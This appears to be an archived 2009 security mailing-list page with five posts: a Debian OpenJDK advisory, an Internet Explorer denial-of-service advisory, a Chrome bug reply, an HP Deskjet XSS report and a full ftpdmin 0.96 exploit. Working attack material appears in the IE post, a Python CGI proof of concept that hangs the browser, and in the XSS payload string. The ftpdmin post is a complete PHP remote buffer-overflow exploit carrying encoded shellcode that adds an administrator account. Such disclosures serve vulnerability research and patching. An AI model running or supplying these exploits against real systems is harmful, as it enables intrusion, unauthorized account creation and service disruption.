date:20090411

[SECURITY] [DSA 1769-1] New openjdk-6 packages fix arbitrary code execution

2009-04-11 Thread Florian Weimer

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1769-1  secur...@debian.org
http://www.debian.org/security/   Florian Weimer
April 11, 2009http://www.debian.org/security/faq
- 

Package: openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2006-2426 CVE-2009-0581 CVE-2009-0723 CVE-2009-0733 
CVE-2009-0793 CVE-2009-1093 CVE-2009-1094 CVE-2009-1095 CVE-2009-1096 
CVE-2009-1097 CVE-2009-1098 CVE-2009-1101

Several vulnerabilities have been identified in OpenJDK, an
implementation of the Java SE platform.

Creation of large, temporary fonts could use up available disk space,
leading to a denial of service condition (CVE-2006-2426).

Several vulnerabilities existed in the embedded LittleCMS library,
exploitable through crafted images: a memory leak, resulting in a
denial of service condition (CVE-2009-0581), heap-based buffer
overflows, potentially allowing arbitrary code execution
(CVE-2009-0723, CVE-2009-0733), and a null-pointer dereference,
leading to denial of service (CVE-2009-0793).

The LDAP server implementation (in com.sun.jdni.ldap) did not properly
close sockets if an error was encountered, leading to a
denial-of-service condition (CVE-2009-1093).

The LDAP client implementation (in com.sun.jdni.ldap) allowed
malicious LDAP servers to execute arbitrary code on the client
(CVE-2009-1094).

The HTTP server implementation (sun.net.httpserver) contained an
unspecified denial of service vulnerability (CVE-2009-1101).

Several issues in Java Web Start have been addressed (CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098).  The Debian packages
currently do not support Java Web Start, so these issues are not
directly exploitable, but the relevant code has been updated
nevertheless.

For the stable distribution (lenny), these problems have been fixed in
version 9.1+lenny2.

We recommend that you upgrade your openjdk-6 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Source archives:

  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.dsc
Size/MD5 checksum: 2471 ac801bf95b5a70dc2872d3829662ec21
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11.orig.tar.gz
Size/MD5 checksum: 51692912 a409bb4e935a22dcbd3529dc098c58de
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.diff.gz
Size/MD5 checksum:   294391 8245a20f2c8886f5a21ccc584be55963

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-doc_6b11-9.1+lenny2_all.deb
Size/MD5 checksum: 12053188 aca3fd411328bdb8ebaecc32cb5dec8c
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-lib_6b11-9.1+lenny2_all.deb
Size/MD5 checksum:  5270602 ac2ec87d2254d75888025068260724c9
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-source_6b11-9.1+lenny2_all.deb
Size/MD5 checksum: 26557844 4162900f514b37b46bd3445c31137038

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_alpha.deb
Size/MD5 checksum:  8173896 624e143dcca33faeef6f18b3b2dbf091
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre_6b11-9.1+lenny2_alpha.deb
Size/MD5 checksum:   260278 bec0a9dbb3193958ea38849920f207b1
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-headless_6b11-9.1+lenny2_alpha.deb
Size/MD5 checksum: 21624912 8d671cce12b85a8c2a275b27ffdefc3c
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_alpha.deb
Size/MD5 checksum: 34552586 9ef7d040a16bfb7cda895fe080a89639
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-demo_6b11-9.1+lenny2_alpha.deb
Size/MD5 checksum:  2373440 4a642fce362f92b7fa55ce07b9cf64ad

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_amd64.deb
Size/MD5 checksum: 46891228 ac3e2086cf139e8243b38c6edbd80dc7
  
http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_amd64.deb
Size/MD5 checksum:  9658430 552cfaa8544f5eedd8b9fea5188e77c5

[BMSA 2009-04] Remote DoS in Internet Explorer

2009-04-11 Thread Nam Nguyen

BLUE MOON SECURITY ADVISORY 2009-04
===


:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
---

We could not find out the definitive description for Internet Explorer from 
Microsoft website. This is our own understanding of the application: Internet 
Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. 
When visit a malicious page, the browser may freeze indefinitely and killing it 
in Task Manager is required. With IE8's default settings, killing the tab 
process simply launches another process and goes to the same malicious page, 
hence repeating the cycle. The root cause is unknown to us. We suspect that it 
is related to the display of unprintable characters on Windows XP, and Vista. 
The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue 
and will be addressing it in the next version of the application.

Workaround
--

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
--

Blue Moon Consulting adapts `RFPolicy v2.0 
http://www.wiretrip.net/rfp/policy.html`_ in notifying vendors.

:Initial vendor contact:

  March 19, 2009: Initial contact sent to sec...@microsoft.com.

:Vendor response:

  March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

  March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME 
format.

  March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and 
informed us of a new case manager, Jack.

  March 21, 2009: We further reported that IE 8 was affected by the same bug, 
in PGP MIME format.

  March 30, 2009: We asked if Microsoft had received our PoC.

  March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could 
not reproduce the behavior of this bug.

  April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista 
Business. Sent in PGP MIME format.

  April 01, 2009: Jack said the email was stripped out and asked us to resend.

  April 02, 2009: We resent the last email in plain text.

  April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in 
no case did Internet Explorer hang indefinitely.

  April 06, 2009: We sent Jack a video clip, in PGP MIME format.

  April 06, 2009: Jack asked us to resend because the email was stripped again.

  April 07, 2009: We resent the clip in plain text to Jack.

  April 09, 2009: Jack acknowledged the receipt and let us know the bug would 
be fixed in the next version of Internet Explorer.

  April 09, 2009: We asked for a confirmation of bug classification.

  April 09, 2009: Jack confirmed this bug was classified as stability, instead 
of a security issue. We therefore decided to release this advisory to the 
public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

  #!C:/python25/python
  import sys
  import random
  
  CHAR_SET = [chr(x) for x in range(0x20)]
  CHAR_SET += [chr(x) for x in range(128, 256)]
  
  def send_file():
l = 80 + 4096
print Content-Type: text/plain
print Content-Length: %d % l
print Cache-Control: no-cache, no-store, must-revalidate
# this is not standardized, but use it anyway
print Pragma: no-cache
print 
# bypass IE download dialog
sys.stdout.write(a * 4096)
# print junks
for i in xrange(l):
sys.stdout.write(random.choice(CHAR_SET))
sys.exit()

  send_file()


Disclaimer
--

The information provided in this advisory is provided as is without warranty 
of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either 
express or implied, including the warranties of merchantability and fitness for 
a particular purpose. Your use of the information on the advisory or materials 
linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd 
reserves the right to change or update this notice at any time.

Cheers
-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn

In Response to Bid 34130 Invalid

2009-04-11 Thread Aditya K Sood


The observed behavior is explained on below mentioned link

http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html

This vulnerability persists in newer version of Google Chrome too.

HP Deskjet 6800 XSS in Web Interface

2009-04-11 Thread mcyr2

A Cross-site scripting input validation error has been identified in the web 
interface of the HP Deskjet 6800 printer family.  By sending a string such as 
scriptalert(found XSS on this page)/script via a POST request to 
/refresh_rate.htm the resulting error page will execute the script.  



Verified on Deskjet 6840 firmware version: XF1M131A, but the firmware seems to 
be generic to the 6800 family, so possibly the entire family is vulnerable.



Vulnerability Timeline: 

3/21/09: Vendor notification via email

3/21/09: Vendor upgrades ticket to next level of support

3/31/09: Vendor's Advanced Support Group replies: the issue that you are 
experiencing is due to faulty firmware of the 

printer and as a result the printer needs to be serviced from a HP 

authorized service center.

3/31/09: I Reply asking what firmware version fixes the issue and ask if this 
vulnerability has been reported previously

3/31/09: Vendor replys: I regret to inform you that there is no specific 
firmware is available for your printer. As the issue is related to the hardware 
of the printer, it is beyond the scope of our email support and needs the 
personal attention of a technician. I would suggest you to get the printer 
serviced at the nearest HP Authorised service centre. For your convenience I 
provided below information to locate the nearest HP Authorised service centre.

ftpdmin v. 0.96 RNFR remote buffer overflow exploit

2009-04-11 Thread nospam

?php
/*
   ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
   by Nine:Situations:Group::surfista
   software site: http://www.sentex.net/~mwandel/ftpdmin/
   our site: http://retrogod.altervista.org/

   bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
   We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to 
   the second memory region.
   We have a very small set of chars that we can use ,RNFR (Rename From) 
command  
   accept pathnames as argument, so characters whose integer representations 
are 
   in the range from zero through 31 and reserved chars are not allowed!
*/

error_reporting(7);
$ftp_server = 192.168.0.1;
$ftp_user   = anonymous;
$ftp_pass   = a...@email.com;

function ftp_cmd($cmd){
global $conn_id;
echo - .$cmd.\n;
$buff=ftp_raw($conn_id,$cmd);
}

#WinExec shellcode of mine, enconded with the alpha2 tool by 
SkyLined, adds
#a surfista admin user with pass pass
#contains hardcoded address, re-encode command:
#alpha2 esp  shdmp.txt

$scode=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
   
Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5.
   
prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN.
   
w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw.
   4gPqcpupr3VQybSrTE1kOA;  
#do not touch, esp adjustment and subsequent call esp, very 
large but we have lots of unused space
$code 
=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
   
NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA;
if (strlen($scode)  272) {die([!] shellcode too large!);}
$conn_id = ftp_connect($ftp_server) or die((!) Unable to 
connect to $ftp_server);
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo (*) Connected as $ftp_u...@$ftp_server\n;
} else {
die((!) Unable to connect as $ftp_user\n);
}
$jnk = str_repeat(\x66,272 - strlen($scode));
$eip=\x44\x3a\x41\x7e; //0x7E413A44  jmp esp, 
user32.dll xp sp3
$jnk_ii = str_repeat(\x66,119 - strlen($code));
$bof=$scode.$jnk.$eip.$code.$jnk_ii;
$boom=RNFR .str_repeat(x,0x0096);
ftp_cmd($boom);
$boom=RNFR .$bof;
ftp_cmd($boom);
$boom=RNFR .str_repeat(x,0x0208);
ftp_cmd($boom);
ftp_close($conn_id);
echo (*) Done !\n;
?

url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html

[SECURITY] [DSA 1769-1] New openjdk-6 packages fix arbitrary code execution

[BMSA 2009-04] Remote DoS in Internet Explorer

In Response to Bid 34130 Invalid

HP Deskjet 6800 XSS in Web Interface

ftpdmin v. 0.96 RNFR remote buffer overflow exploit

5 matches

Site Navigation

Mail list logo

Footer information